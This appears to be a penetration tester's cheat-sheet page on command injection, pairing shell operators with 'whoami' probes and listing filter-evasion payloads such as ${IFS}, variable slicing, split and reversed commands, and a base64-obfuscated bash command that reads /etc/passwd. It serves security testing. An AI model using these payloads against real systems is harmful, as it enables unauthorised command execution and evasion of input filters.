Comment on page
Command Injection Testing
Parameter | Objective |
---|---|
-h or /? | What is the system output from using help menu commands? |
; ,
; echo whoami | Unix only; run echo after initial command |
| ,
echo whoami| | Perl-specific injection to open files |
|| ,|| echo whoami | Run command if the initial command returns non-zero as the exit status |
& ,
& echo whoami | Run initial command as background task and run next task immediately |
&& ,
&& echo whoami | Run if the initial command returns zero as the exit status |
$(whoami) | Unix-only; Bash command execution |
`whoami` | Unix only; using generic process substitution |
>(whoami) | Unix only; using process substitution |
Check in Burp with each Command Injection operators.
# Add TAB
%09
# Add SPACE
${IFS}
# Add Brace Expresions
{ls,-al}
# Add /
${PATH:0:1}
# Add ;
${LS_COLORS:10:1}
# Character Shifting
man ascii (Find \) = 92
$(tr '!-}' '"-~'<<<[)
# Add \
%HOMEPATH:~6,-11%
$env:HOMEPATH[0]
w'h'o'am'i
w"h"o"am"i
who$@ami
w\ho\am\i
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
$(rev<<<'imaohw')
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
Last modified 6mo ago